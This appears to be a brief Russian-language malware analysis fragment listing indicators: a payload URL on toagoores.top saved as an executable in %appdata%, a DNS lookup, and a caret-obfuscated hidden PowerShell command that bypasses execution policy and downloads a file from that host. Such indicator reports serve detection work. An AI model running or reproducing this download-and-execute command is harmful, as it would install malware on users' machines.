Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^W^eR^s^HEL^L.EXE^ -EXEcuT^ionPolI^Cy BYP^AS^s ^-^n^OPRo^Fi^LE -wI^N^DowStylE h^iDd^eN^ ^(^ne^W-^ObJe^c^T^ SY^sTEm^.net.^WeBCl^IeNt).DOw^NL^O^adfIle('http://toagoores.top/read.php...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "pO^W^eR^s^HEL^L.EXE^ -EXEcuT^ionPolI^Cy BYP^AS^s ^-^n^OPRo^Fi^LE -wI^N^DowStylE h^iDd^eN^ ^(^ne^W-^ObJe^c^T^ SY^sTEm^.net.^WeBCl^IeNt).DOw^NL^O^adfIle('http://toagoores.top/read.php...' (со скрытым окном)